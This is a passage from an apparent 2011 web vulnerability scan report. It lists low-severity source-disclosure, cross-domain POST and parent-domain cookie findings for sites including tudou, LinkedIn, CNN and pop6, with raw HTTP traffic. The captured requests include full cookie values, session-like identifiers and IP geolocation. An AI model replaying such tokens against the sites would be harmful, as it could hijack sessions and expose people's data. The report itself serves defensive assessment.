del.tweet.targetTypes=[0,"program","playlist","tweet","tuya","plupdate",0,"user"];TUI.Model.tweet.getTweetUrl=function(a){return tui_domain+"/details.html?id="+a};var tpl_page_mydou_v2_channel_stream='<%for(var i = 0, count = 0; i < d.length; i++){%> <% if(count == visibleSize)break; var msg = d[i]; if(!msg.targetType||msg.status==0)continue; var oriTweet = mod.getOritweet(msg, db.tweet); if(!oriTweet.targetType||oriTweet.status==0)continue; var target = db[mod.targetTypes[oriTweet.targetType]](oriTweet.targetId); if(target.status==0)continue; var user = db.user(msg.userId); if(!user || user.status == 0)continue; if($(\'#twt_\' + msg.id).length)continue; var    pt = TUI.escapeHTML(target.title), uu = TUI.Model.common.getUserHomeUrl(user.name), un = escapeHTML(user.nic), pu = \'\', tu = tui_domain+\'/details/?id=\'+msg.id; if(msg.ownerType==7){ pu = TUI.Model.common.getProgramUrl(target.code); }else{ pu = TUI.Model.common.getPlaylistUrl(target.id,{targetData: msg.targetData}); }; count++; %> <div class="stream_item" id="twt_<%=msg.id%>" mid="<%=msg.id%>">
...[SNIP]...
<a href="<%=tu%>" target="_blank" title="<%=pt%>"><img src="<%=target.pic%>" width="91" height="55" />
...[SNIP]...
<a class="vinf" href="<%=tu%>" target="_blank"><%=target.time%></a> </div> <div class="txt"> <%if(msg.ownerType==7){%> <a href="<%=uu%>" target="_blank" title="<%=un%>" class="atUser" unic="<%=user.nic%>"><%=escapeHTML(user.nic)%></a> <%}else if(msg.ownerType==2){%> <em>
...[SNIP]...
<a href="<%=tu%>" target="_blank" class="link" title="<%=msg.txtEsc%>"><%=TUI.substr(msg.txtEsc,100)%></a>(<%=beautiTime(msg.dt)%>) </div> </div> <%};%>';var tpl_page_mydou_v2_recommendUsers_recommendUsers='<%data.forEach(function(item){%> <% var uu = TUI.Model.common.getUserHomeUrl(item.username), un = TUI.escapeHTML(item.nickname), uinfo = TUI.escapeHTML(item.info); %> <div class="pack pack_user" uid="<%=item.userId%>" >
...[SNIP]...
<a href="<%=uu%>" title="<%=un%>" target="_blank"> <img class="atUser" unic="<%=item.nickname%>" width="50" height="50" src="<%=item.userpic%>" />
...[SNIP]...
<a href="<%=uu%>" title="<%=un%>" class="atUser" unic="<%=item.nickname%>" target="_blank"><%=un%></a><%if(item.isVuser){%><span class="vip">
...[SNIP]...
</h6> <%if($.trim(item.info)!=\'\'){%><p title="<%=uinfo%>"><%=uinfo%></p>
...[SNIP]...
hange:i,follow:b,test:function(){setTimeout(function(){c("wrap").find(".follow").eq(0).click()},0);setTimeout(function(){c("wrap").find("#changeRecoms").click()},1000)}})});var tpl_view_select_select='<%if(init){%> <div class="tui_select <%=className%>" id="<%=id%>">
...[SNIP]...
<a href="#" class="selected_option" val="<%=options[selected].val%>"><%=options[selected].label%></a> </div> <div class="options"> <%options.forEach(function(item){%> <div class="item<%=options[selected] == item ? \' current\' : \'\'%>"><a href="#" class="option" val="<%=item.value%>"><%=item.label%></a></div> <%});%> </div> <%if(init){%> </div>
...[SNIP]...
<div class="h <%if(!window.uid){%>anonymous<%};%>"> <h2> <%if(window.uid){%> <a href="<%=tui_domain%>/got/" target="_blank">
...[SNIP]...
</a> <%}else{%> <a href="<%=tui_domain%>/square.html" target="_blank">
...[SNIP]...
<a href="<%=tui_domain%>/follow/" target="_blank">
...[SNIP]...
<a href="<%=tui_domain%>/follow/playlist.html" target="_blank">
...[SNIP]...
</div> <%if(window.uid){%> <a class="mo" href="<%=tui_domain%>/got/" target="_blank">
...[SNIP]...
</a> <%}else{%> <a class="mo" href="<%=tui_domain%>/square.html" target="_blank">
...[SNIP]...
</div>';var tpl_page_index_v2_irec='<%data.forEach(function(item, i){%> <% var vu = main_domain + \'/programs/view/\' + item.code + \'/\'; %> <div class="pack pack_video_card">
...[SNIP]...
<a href="<%=vu%>" model="<%=item.model%>" itemid="<%=item.itemId%>" title="<%=item.title%>" target="new" class="inner" coords="_tAA"><img width="132" height="99" src="<%=item.picUrl%>" alt="<%=item.title%>" class="pack_clipImg"/>
...[SNIP]...
<a href="<%=vu%>" model="<%=item.model%>" itemid="<%=item.itemId%>" target="new" title="<%=item.title%>" coords="_tAB"><%=TUI.escapeHTML(TUI.substr(item.title, 28))%></a>
...[SNIP]...
<span class="d_play" title="...."><%=item.playAmount%></span> <span class="d_cmt" title="...."><%=item.commentCount%></span>
...[SNIP]...
<a title="<%=item.ownerName%>" href="<%=main_domain%>/home/_<%=item.ownerId%>" target="_blank" coords="_tK@"><%=TUI.escapeHTML(item.ownerName)%></a> <%if(item.director == \'1\'){%> <a target="_blank" title=".........." href="<%=main_domain%>/my/dj/"><img src="<%=css_domain%>/skin/__g/img/sprite.gif" class="sprite sprite_director" alt="......!"/>
...[SNIP]...
<a href="<%=tui_domain%>/square.html" target="_blank">
...[SNIP]...
<a href="<%=main_domain%>/my/setting/findFriend.action" target="_blank">
...[SNIP]...
<a class="pic" href="<%=tui_domain%>/got/" target="_blank">
...[SNIP]...
</div> ';var tpl_page_mydou_v2_profile_profilePanel='<%if(id != 0 && status != 0){ var uu = TUI.Model.common.getUserHomeUrl(name), unic = TUI.escapeHTML(nic); %> <div class="user_pack">
...[SNIP]...
<a target="_blank" href="<%=uu%>" title="<%=unic%>"><img width="50" height="50" src="<%=pic%>">
...[SNIP]...
<a target="_blank" title="<%=unic%>" href="<%=uu%>"><%=unic%></a><%if(isVuser){%><span class="vip_user">
...[SNIP]...
<div class="info"><%if(location!=\'\'){%><span class="location">
...[SNIP]...
</b><%=location%></span><%}%><%=sex%></div>
...[SNIP]...
<a href="<%=main_domain%>/home/tui/u<%=id%>t1.html" target="_blank"><%=twtNum%></a>
...[SNIP]...
<a href="<%=main_domain%>/home/tui/u<%=id%>t2.html" target="_blank"><%=subNum%></a>
...[SNIP]...
<a href="<%=main_domain%>/home/tui/u<%=id%>t3.html" target="_blank"><%=subedNum%></a>
...[SNIP]...
<a href="<%=main_domain%>/home/item_u<%=id%>s0p1.html" target="_blank"><%=itemNum%></a></span> </div> <%if(desc!=\'\'){%><div class="desc"><%=desc%></div><%}%> </div> </div> <%if(uid != id){%> <div class="do"> <%if(relationship > 1){%> <a class="private_message" target="_blank" href="http://message.tudou.com/addMsg.html?u=<%=id%>">
...[SNIP]...
<span class="eachother" <%if(relationship != 3){%>style="display: none"<%}%>
...[SNIP]...
</span> <%if(relationship == 1 || relationship == 3){%> <span class="unfollow_btn">
...[SNIP]...
<a class="unfollow" uid="<%=id%>" href="#">....</a></span> <%}else{%> <span class="follow_btn"><a class="follow" uid="<%=id%>" href="#">
...[SNIP]...
<%}%> <%}else{%> <p class="not_exist">
...[SNIP]...

10.8. http://platform.linkedin.com/js/nonSecureAnonymousFramework  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://platform.linkedin.com
Path:   /js/nonSecureAnonymousFramework

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /js/nonSecureAnonymousFramework?v=0.0.1130-RC2.8337-1337 HTTP/1.1
Host: platform.linkedin.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&ffb9fd87-5fef-4c75-aff7-69ec3ecfc40f"; __utma=23068709.1023992008.1312316317.1312316317.1312316317.1; __utmz=23068709.1312316317.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-606535281-1312316322746; lang="v=2&lang=en&c="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Length: 125862
Date: Mon, 15 Aug 2011 18:46:11 GMT
Connection: close

(function(){
var l,
doAuth,
h = [],
valid = false,
a = "",
fwk = "http://platform.linkedin.com/js/framework?v=0.0.1128-RC2.7982-1337",
xtnreg = /extensions=([^&]*)&?/,
xtn
...[SNIP]...
<?js ?>";
l=l.split(" ");
var p=l[0]||"<?js",o=l[1]||"?>";
if(!p||!o){throw new Error("Template markers must be set.")
}if(p==o){throw new Error("Start and end markers cannot be identical.")
}p=new RegExp(b(p),"g");
o=new RegExp(b(o),"g");
var n=["","var p=
...[SNIP]...

10.9. http://www.tudou.com/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.tudou.com
Path:   /

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET / HTTP/1.1
Host: www.tudou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: tws0.3
Date: Mon, 15 Aug 2011 18:55:46 GMT
Content-Type: text/html
Connection: close
Last-Modified: Mon, 15 Aug 2011 18:53:30 GMT
Content-Length: 247630
Expires: Mon, 15 Aug 2011 19:02:36 GMT
Cache-Control: max-age=420
Vary: Accept-Encoding
Age: 10
X-Cache: HIT from www.tudou.com

<!DOCTYPE html>
<html>
<head>
<meta charset="gbk"/>

<title>......_...................._............,............,............</title>
<meta name="Keywords" content="......,....,....,........,...
...[SNIP]...
dList"));f($("#rankList4"));f($("#rankList1"));f($("#rankList2"));f($("#rankList3"));f($("#partnerbox"));f($("#secTopuser"));var k="http://amch.questionmarket.com/adsc/d724754/2/725490/adscout.php?ord=<%=random%>";TUI.module.use("/fn/saleloader",function(){if(window.tpes){tpes.forEach(function(z){this.exposeStat({thirdPartExposure:z})},adExtension)}$(document.body).click(function(A){var z=A.target;if(/cmsstat/
...[SNIP]...

10.10. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.wireless.att.com
Path:   /global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 09 Aug 2011 22:05:54 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 6614
Expires: Mon, 15 Aug 2011 18:19:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:20 GMT
Connection: close
Set-Cookie: TLTHID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com
Set-Cookie: TLTSID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com
Set-Cookie: TLTUID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:20 GMT
Set-Cookie: BIGipServerpWL_7010_7011=248631687.25115.0000; path=/

GIF89a_...................................l..............=;;pw.ECB...............JKL-+)QRT...............R]/.....422,.....%#"=Js\\].........cbd...zzy.........srr...............lji......X......
   ...`
...[SNIP]...
.......GHI...ffg...889)()................... .............__b...../OOO`........a.....??@"(1...YYZWWX......npv.....................................................................
......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...

11. Cross-domain POST  previous  next
There are 2 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


11.1. http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /2011/08/15/markets/markets_newyork/index.htm

Issue detail

The page contains a form which POSTs data to the domain www.bankrate.com. The form contains the following fields:

Request

GET /2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2 HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:50 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:16 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 63285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Market Report - Aug. 15
...[SNIP]...
<br>
           <form action="http://www.bankrate.com/funnel/mortgages/mortgage-results.aspx" target="_blank" method="post">
               <input type="text" name="bankratezip" id="bankratezip" value="Enter ZIP code" size="12" maxlength="15" class="zipbox" onfocus="if (this.value == 'Enter ZIP code') {this.value = '';}" onblur="if (
...[SNIP]...

11.2. http://pop6.com/p/memsearch.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pop6.com
Path:   /p/memsearch.cgi

Issue detail

The page contains a form which POSTs data to the domain secure.friendfinder.com. The form contains the following fields:

Request

POST /p/memsearch.cgi HTTP/1.1
Host: pop6.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/
Content-Length: 281
Cache-Control: max-age=0
Origin: http://pop6.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ff_who=r,5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; v_hash=_english_0; IP_COUNTRY=United States; ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; LOCATION_FROM_IP=ip_type&Mapped&connection&tx&country_code&US&lat&37.33053&asn&36351&state&California&ip_routing_type&fixed&carrier&softlayer+technologies+inc.&city&San+Jose&postal_code&95122&country_code_cf&99&state_cf&95&latitude&37.33053&second_level_domain&softlayer&country&United+States&longitude&-121.83823&country_name&United+States&area_code&408&timezone&-8.0&line_speed&high&aol&0&top_level_domain&com&region&southwest&city_cf&80&pmsa&7400&zip&95122&msa&41940&continent&north+america&lon&-121.83823&dma_code&807; HISTORY=20110815-1-Dc; REFERRAL_URL=; click_id_time=1867065876_2011-08-15 11:57:42; ki_u=e0c8bfdc-f008-5f82-d3b9-1cc1d298f090; ki_t=1313434723803%3B1313434723803%3B1313434723803%3B1%3B1

who=r%2C5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w%2FCzZc1DYiFS5o5eIrIEI51W9T%2FzDmtNu%2Fo&site=ff&searchtype=photo_search&looking_for_person=1&find
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:35 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ff_who=r,9tCSyhGmD_RyWOBWStVf6Xu9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; path=/; domain=.pop6.com
Set-Cookie: v_hash=_english_0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: LOCATION_FROM_IP=connection&tx&ip_type&Mapped&lat&37.33053&country_code&US&asn&36351&state&California&carrier&softlayer+technologies+inc.&ip_routing_type&fixed&city&San+Jose&state_cf&95&country_code_cf&99&postal_code&95122&latitude&37.33053&second_level_domain&softlayer&country&United+States&area_code&408&country_name&United+States&longitude&-121.83823&line_speed&high&timezone&-8.0&aol&0&region&southwest&top_level_domain&com&city_cf&80&pmsa&7400&msa&41940&zip&95122&continent&north+america&lon&-121.83823&dma_code&807; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: HISTORY=20110815-3-Dcs1; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ii70-15.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 75888
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<table>
<form method="post" action="https://secure.friendfinder.com/p/login.cgi" name="LOGIN" target="_top" >
<div>
...[SNIP]...

12. Cookie scoped to parent domain  previous  next
There are 84 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


12.1. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=pubmaticae&adSpace=audienceselect&tagKey=1532170383&th=35348227670&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fads.pubmatic.com%2FAdServer%2Fjs%2Fsyncuppixels.html%3Fp%3D25273%26s%3D25281&f=2&p=13688099&a=1&rnd=13695087 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=a9nuJts2aFvDAJsbYI7GmZbtr3jXXDntgvTsHymjdZcwZcZafb5C1WurhOLDJMncTFeSuHrZaEIYVBqqpT06MsySZboEAE0XMGXWUbpaU4eGZbE2abr

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=avnxnXtMPm4bTgUpMCGc2YOEj2XKltO4jhQcP1arcbEyMnUn051cmZbBAfNvcFmZdqjiMyJgTWfGqCq9bwGDtKZdLIbKcvtmfyE8Q9DsroiBfET5IbIcxZdqAJZbqrDSbnQMZaoxJY; path=/; domain=.tribalfusion.com; expires=Sun, 13-Nov-2011 18:41:38 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 220
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript" language="JavaScript">\r\nvar img = new Image();\r\nimg.src = "http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTE4MzImdGw9MTU3NjgwMA==
...[SNIP]...

12.2. http://ad.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=1&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=MMbe9F8c4vIW12sLi2dyci4DUN53kixla9Hhjy6Hzs_faqaDzVRu9ZiuBStYaftYXKB5GtYFP05Zh2SBlosu53bZWjGN2gF2ncsnwOMOSJtfhxpxCVZWo-G8JZeL2-AGEoXq-gPE5Ffs4A1KWdSJ3Xy4T1NZSHp0kR7yTyJ9_irGpAX7uMSqUeH6p4KGvUSZUq7OWife1h2M6Ewfw7GonRDoQNluocXO_kLxCO03TeEqGbRc_WXZLv6_wjPrFYWkRzoy0KsqvLYpwqlgKHkKO7v2cs61vb5d-EUL-mztoUL_BJuqMxnf5kZ4bjzPPBBZl4sOJ1mrC2iEDyk-G34KEYEk4UmX8i4vUYPBL0RbR7ivEzlzFI00MzI2gY6ItzbVOxkr-OO3w_o38FzKCKQ6Lm18jlcUKTrHAgecQO0u_glplHkENwT_vdM5uigT02Pno0_YmxEDTDUEKIRIqGJPfQHDMdsELscQY0iJG8ZU5Ty4GWWGARMuC9OfaFsrmvfxq63JmDsLJ-8CJbf3hY5BZTnskYqZuO4nCGPJTpDqDm8qnTQbufGXlJIhj71lBYrfro1Hb-oXI0uLH1BPomVksC8KUj7e-F2aqqZc87ofCVk5wAQqn5t3ldANs6bZF2YSHOwEyK_UcWlZltoKH3xiIIu2yhXmnBsviwnJ85Ed5aDevF_SkTMMXcVeFMc5tN7pEoXq-gPE5Ffs4A1KWdSJ3Q4zLI5CWlqCgjtHPoLh-sXGpAX7uMSqUeH6p4KGvUSZHjMTXkaAxWETmff6p0CCynXm2SuS6NlYI5OxjuXgTRgqGbRc_WXZLv6_wjPrFYWkMvMzV1KQ715fKlLs1_1zzbv2cs61vb5d-EUL-mztoULKnruFIQYKaPiMC6W5UbDg9o6CAsQCwtFM5Y7fkjHOf4Ek4UmX8i4vUYPBL0RbR7j4K5R2t8-fqw2RIN4cjypIOxkr-OO3w_o38FzKCKQ6Lm9OMIDolQH9GFZKykykhOdYuuYQv45PXfKbyz1md1g8UsEbRg4Tfn8hxcnJGDABTDQg-QbKO_N-vuvZwJz7zYy4GWWGARMuC9OfaFsrmvfx0H_cdrflarr8ERICfjtlnMaI-JJ-NoWyQaFab98q1_Zde4x4nJg09oak0s1lJ4ym7ev_sVYKpHwxGAloIhjxMC8KUj7e-F2aqqZc87ofCVmnzve-Elt6O9TGUTxKZTBDxZ1J_E_O522Ye9lt1xgY0vLOThBfDZko64vFQpO0eVCqoq3BB-vp9ASgk-DDEv5NEoXq-gPE5Ffs4A1KWdSJ3YkYFaBQ79ulBTTMuVNwWn3GpAX7uMSqUeH6p4KGvUSZ3RVmoAwX5pfOPJTb-2FpLb7Z-GfN3yPWx-jWv5rm4mEqGbRc_WXZLv6_wjPrFYWkyKtTKK2UqCBv6H_FflpgYCoZtFz9Zdku_r_CM-sVhaS0nQLPgJd6gPto5vjI1Iutu_ZyzrW9vl34RQv6bO2hQjR2INxqcXhOvUTMwnimoVBQpW6dPdstvKpYA_5893LwgSThSZfyLi9Rg8EvRFtHuFTmVUFnn6bwcz39Ym9oMKo7GSv447fD-jfwXMoIpDou0ugi34ufxqKqsc2Mtte3vDgsGMLzbiZOc-I9zjgk_f5CTby2R7XeohKUqfT7N4kH74DpXFuxI1x9y7A3NcO-1bgZZYYBEy4L059oWyua9_EGuwwMAO-MRya4QZsSn3WqHZgbJN9gHWpQZmXYTZVCh268txBWlhf05t9RfUxfrO34VPOmHtYwp1RxCIl5yWqeLwpSPt74XZqqplzzuh8JWX8dvgjNu-gFIbxMLQKtBeIkehFMwCZGLm7BQMVlkV7KMHND2CdcMnagwF9Vx8tumZRJ3v98564jan5uyPa9LugSher6A8TkV-zgDUpZ1Ind6uHY3YR3riZA9dOzPsOrYMakBfu4xKpR4fqngoa9RJmO-wf97hezQkM4wyW5iQ-RwGxxKFq0JdDSCdP6YGujVioZtFz9Zdku_r_CM-sVhaSQsI4YtVNSaSHRo1z9-PfFu_ZyzrW9vl34RQv6bO2hQkroMkUaOOyDc-lCYw8p-jSqRRyCZjuk9zFxsj37s0Fl_4mvLB_-8Y5Oms5Uqh6HCnJ-BDkP0Hb-ZaXldXPIHPA7GSv447fD-jfwXMoIpDouZbh2dC73BhWw8_b5-6kKe4AFC-iivcKjHCCWpb_i39hSwRtGDhN-fyHFyckYMAFMTOpPWKF2Ax6b7rOHxcXUA7gZZYYBEy4L059oWyua9_H8iF8HDsCRa-9-pUq8YCKwIu4nZMWVWrFcRDFtuQymYUD1RI5tHbziFyffCyec3xFVtvCxutmhKQqI4rynX8EbVOORQ_Ko6kwNCBF1JosDuIx-MGxw6860Zgp9LuiZKfd1THLpKtTKl9Hy-9LIdrTwPkUCHIDocT4HwntaBwSiXVmGe8cmYxtGs87jVjdcUhR6Tm5A3Jl0kkCygktzwY_P2nBq1MLiym4M8a84WNRVyL5tM47YBQRfKyY2Al1gOQ0csSdIeEjo1eTSJN1N1te4P8bndmlf8vcwmNoTNcAkVr8qAbRUJoFNsCnHeEAnBhu_KgG0VCaBTbApx3hAJwYbvyoBtFQmgU2wKcd4QCcGGwUPlrOdmMzuy-JVRLC61VUc_XVxSdq289R16FkEIpjxHP11cUnatvPUdehZBCKY8Rz9dXFJ2rbz1HXoWQQimPE_-4For9FCpvxRN9dPDdyfl4wgPrBWlfpoT64Vvf0QcbqNueryT6Q6nKR3xMwJa0y93McaV8JWnaOstbjjF26BF-Apr4mvzveDGnJv-5a0H-QPevsbWEmzJkKeA3Bjf1Y3sUDNtNXvnuxxIfpNVPjsN7FAzbTV757scSH6TVT47DexQM201e-e7HEh-k1U-Ow3sUDNtNXvnuxxIfpNVPjsIL8XR7E1wpkwV56j-0nTlSXVNEmg3EUswsQW8uB2bCoOaoqpfRx3Z8kq8nb8bONUU_y0sy650wRcNU3FpSuXZVP8tLMuudMEXDVNxaUrl2VT_LSzLrnTBFw1TcWlK5dlU_y0sy650wRcNU3FpSuXZWmxU5qvbFVYpvnHYeM98xyM8qRGj8_sQ9Sn73gM-wC5jPKkRo_P7EPUp-94DPsAucyfOw79Fc-70_uTw3s0QiME_97mGKY6_98ewthfpB1rBP_e5himOv_fHsLYX6Qda4guCjZVrDggv46FtK20_Qz7Tuu1boe16PNcOFeNeN5C-07rtW6HtejzXDhXjXjeQmvybiTcE5o1p8VWzBVvNto; 